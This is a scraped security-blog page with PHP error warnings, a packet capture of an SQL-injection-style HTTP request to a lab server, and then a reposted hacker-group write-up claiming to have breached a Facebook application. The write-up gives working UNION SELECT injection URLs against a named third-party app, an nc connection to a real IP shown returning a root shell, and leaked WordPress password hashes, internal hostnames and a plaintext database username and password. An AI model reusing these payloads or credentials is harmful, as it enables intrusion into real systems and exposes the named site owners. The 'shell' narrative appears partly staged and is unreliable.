Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 164

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 167

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 170

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 173

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 176

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 178

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 180

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 202

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 206

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 224

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 225

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 227

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/includes/class.layout.php on line 321

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 56

Warning: Creating default object from empty value in /home/ethical/public_html/wp-content/themes/platform/admin/class.options.metapanel.php on line 49
Convered PCAP Traffic Samples | Certified Ethical Hackers Security Analyst Malware Hacking Information
Currently viewing the category: "Convered PCAP Traffic Samples"

2008-04-01 10:43:25.181143 IP 10.10.40.4.1057 > 10.10.40.5.80: S 3795861270:3795
861270(0) win 64512 <mss 1460,nop,nop,sackOK>
E..0..@…..

(.

(..!.P.@?…..p….9……….
2008-04-01 10:43:25.181699 IP 10.10.40.5.80 > 10.10.40.4.1057: S 1761856733:1761
856733(0) ack 3795861271 win 65535 <mss 1460,nop,nop,sackOK>
E..0+.@…j.

(.

(..P.!i….@?.p….H……….
2008-04-01 10:43:25.181734 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 1 win 64512

E..(..@…..

(.

(..!.P.@?.i…P…….
2008-04-01 10:43:25.181934 IP 10.10.40.4.1057 > 10.10.40.5.80: P 1:258(257) ack
1 win 64512
E..)..@…..

(.

(..!.P.@?.i…P…e]..GET /praveen/index.php?browse=/*select%20*%20from HTTP/1.1

Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.5072
7)
Host: 10.10.40.5
Connection: Keep-Alive
2008-04-01 10:43:25.183313 IP 10.10.40.5.80 > 10.10.40.4.1057: . 1:1461(1460) ac
k 258 win 65278
E…+.@…e.

(.

(..P.!i….@@.P…Z…HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.1
Date: Tue, 02 Mar 2010 14:53:39 GMT
Connection: close
Content-Length: 4040
Content-Type: text/html

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 3.2 Final//EN”>
<html dir=ltr>

<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>

<META NAME=”ROBOTS” CONTENT=”NOINDEX”>

<title>The page cannot be found</title>

<META HTTP-EQUIV=”Content-Type” Content=”text-html; charset=Windows-1252″>
</head>

<script>
function Homepage(){
<!–
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm

//For testing use DocURL = “res://shdocvw.dll/http_404.htm#https://www.m
icrosoft.com/bar.htm”
DocURL = document.URL;

//this is where the http or https will be, as found by searching for ://
but skipping the res://
protocolIndex=DocURL.indexOf(“://”,4);

//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf(“/”,protocolIndex + 3);

//for the href, we need a valid URL to the domain. We search for
the # symbol to find the begining
//of the true URL, and add 1 to skip it – this is the BeginURL value. We
use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex – 4,serverIndex);
BeginURL=DocURL.indexOf(“#”,1) + 1;

urlresult=DocURL.substring(BeginURL,serverIndex);
2008-04-01 10:43:25.183343 IP 10.10.40.5.80 > 10.10.40.4.1057: . 1461:2921(1460)
ack 258 win 65278
E…+.@…e.

(.

(..P.!i….@@.P…R~..//for display, we need to skip after http://, and go to th
e next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);

InsertElementAnchor(urlresult, displayresult);
}

function HtmlEncode(text)
{
return text.replace(/&/g, ‘&amp’).replace(/’/g, ‘&quot;’).replace(/</g, ‘&lt
;’).replace(/>/g, ‘&gt;’);
}

function TagAttrib(name, value)
{
return ‘ ‘+name+’=”‘+HtmlEncode(value)+’”‘;
}

function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( ‘<’ + tagName + attrib + ‘>’ + HtmlEncode(inner) );
if (needCloseTag) document.write( ‘</’ + tagName +’>’ );
}

function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf(‘MSIE’) + 5, 3 );

return (IEVer.charAt(1)==’.’ && IEVer >= ’5.5′) ?
encodeURI(href) :
escape(href).replace(/%3A/g, ‘:’).replace(/%3B/g, ‘;’);
}

function InsertElementAnchor(href, text)
{
PrintTag(‘A’, true, TagAttrib(‘HREF’, URI(href)), text);
}

//–>
</script>

<body bgcolor=”FFFFFF”>

<table width=”410″ cellpadding=”3″ cellspacing=”5″>

<tr>
<td align=”left” valign=”middle” width=”360″>
<h1 style=”COLOR:000000; FONT: 13pt/15pt verdana”><!–Problem–>The page
cannot be found</h1>
</td>
</tr>

<tr>
<td width=”400″ colspan=”2″>
<font style=”COLOR:000000; FONT: 8pt/11pt verdana”>The page you are look
ing for might have been removed, had its name
2008-04-01 10:43:25.183370 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 2921 win 64
512
E..(..@…..

(.

(..!.P.@@.i..FP…….
2008-04-01 10:43:25.185056 IP 10.10.40.5.80 > 10.10.40.4.1057: FP 2921:4204(1283
) ack 258 win 65278
E..++.@…e.

(.

(..P.!i..F.@@.P……. changed, or is temporarily unavailable.</font></td>
</tr>

<tr>
<td width=”400″ colspan=”2″>
<font style=”COLOR:000000; FONT: 8pt/11pt verdana”>

<hr color=”#C0C0C0″ noshade>

<p>Please try the following:</p>

<ul>
<li>If you typed the page address in the Address bar, make sure that it is
spelled correctly.<br>
</li>

<li>Open the

<script>
<!–
if (!((window.navigator.userAgent.indexOf(“MSIE”) > 0) && (window.navi
gator.appVersion.charAt(0) == “2″)))
{
Homepage();
}
//–>
</script>

home page, and then look for links to the information you want.</li>

<li>Click the <a href=”javascript:history.back(1)”>Back</a> button to try
another link.</li>
</ul>

<h2 style=”font:8pt/11pt verdana; color:000000″>HTTP 404 – File not found<br
>
Internet Information Services<BR></h2>

<hr color=”#C0C0C0″ noshade>

<p>Technical Information (for support personnel)</p>

<ul>
<li>More information:<br>
<a href=”http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=
&ID=404&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=” target=”_blank”>Microsoft Supp
ort</a>
</li>
</ul>

</font></td>
</tr>

</table>
</body>
</html>

2008-04-01 10:43:25.185161 IP 10.10.40.4.1057 > 10.10.40.5.80: . ack 4205 win 63
229
E..(..@…..

(.

(..!.P.@@.i..JP…….
2008-04-01 10:43:25.185527 IP 10.10.40.4.1057 > 10.10.40.5.80: F 258:258(0) ack
4205 win 63229
E..(..@…..

(.

(..!.P.@@.i..JP…….
2008-04-01 10:43:25.186047 IP 10.10.40.5.80 > 10.10.40.4.1057: . ack 259 win 652
78
E..(+.@…j.

(.

(..P.!i..J.@@.P………….

====================================================

FaceBook's servers was hacked again by Inj3ct0r Team
====================================================
[+] English translation
    Inj3ct0r official website => Inj3ct0r.com
    Inj3ct0r community        => 0xr00t.com
                     __           __      ___
 __            __  /'__`\        /\ \__  /'__`\                
/\_\    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __       ___    ___     ___ ___         
\/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\    /'___\ / __`\ /' __` __`\  
 \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/  __/\ \__//\ \L\ \/\ \/\ \/\ \ 
  \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\ 
   \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/ \/_/\/____/\/___/  \/_/\/_/\/_/
              \ \____/                                          
               \/___/
[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\ \/\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
 \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
          [Introduction]
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, do not sell backup server does not delete files.
We have demonstrated the flaw in the system. Start =] ..
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
   __             __      _    
 /'__`\         /'__`\  /' \   
/\ \/\ \  __  _/\ \/\ \/\_, \  
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ 
 \ \ \_\ \/>  </\ \ \_\ \ \ \ \
  \ \____//\_/\_\\ \____/  \ \_\
   \/___/ \//\/_/ \/___/    \/_/
        [Search for bugs / crash]
inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...
Brevity the soul of wit..
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..
   __             __      ___    
 /'__`\         /'__`\  /'___`\  
/\ \/\ \  __  _/\ \/\ \/\_\ /\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
 \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
  \ \____//\_/\_\\ \____//\______/
   \/___/ \//\/_/ \/___/ \/_____/
              [0wner]
Successful Shell on 31337 port . . . . .
inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
-[0x33]- Proofs
############
# REQUESTS #
############
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
read /etc/hosts
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com
----------------------------------
/etc/my.cnf
#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14
goOd =] Nice Hacking old school xD
   __             __      __    
 /'__`\         /'__`\  /'__`\  
/\ \/\ \  __  _/\ \/\ \/\_\L\ \ 
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
 \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
  \ \____//\_/\_\\ \____/\ \____/
   \/___/ \//\/_/ \/___/  \/___/
           [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)
   __             __   __ __     
 /'__`\         /'__`\/\ \\ \    
/\ \/\ \  __  _/\ \/\ \ \ \\ \   
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_ 
 \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
  \ \____//\_/\_\\ \____/\/_/\_\_/
   \/___/ \//\/_/ \/___/    \/_/
             [Greetz]
Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!
                       31337 Inj3ct0r Members:
cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,
Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..
----------------------------------------------------------------------------------------------
                        Personally h4x0rz:
Sir Zaid (none)
You are good hackers. Respect y0u!
Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]
At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
H.A.C.K.T.I.V.I.S.M. WIN! =]
Set your Twitter account name in your settings to use the TwitterBar Section.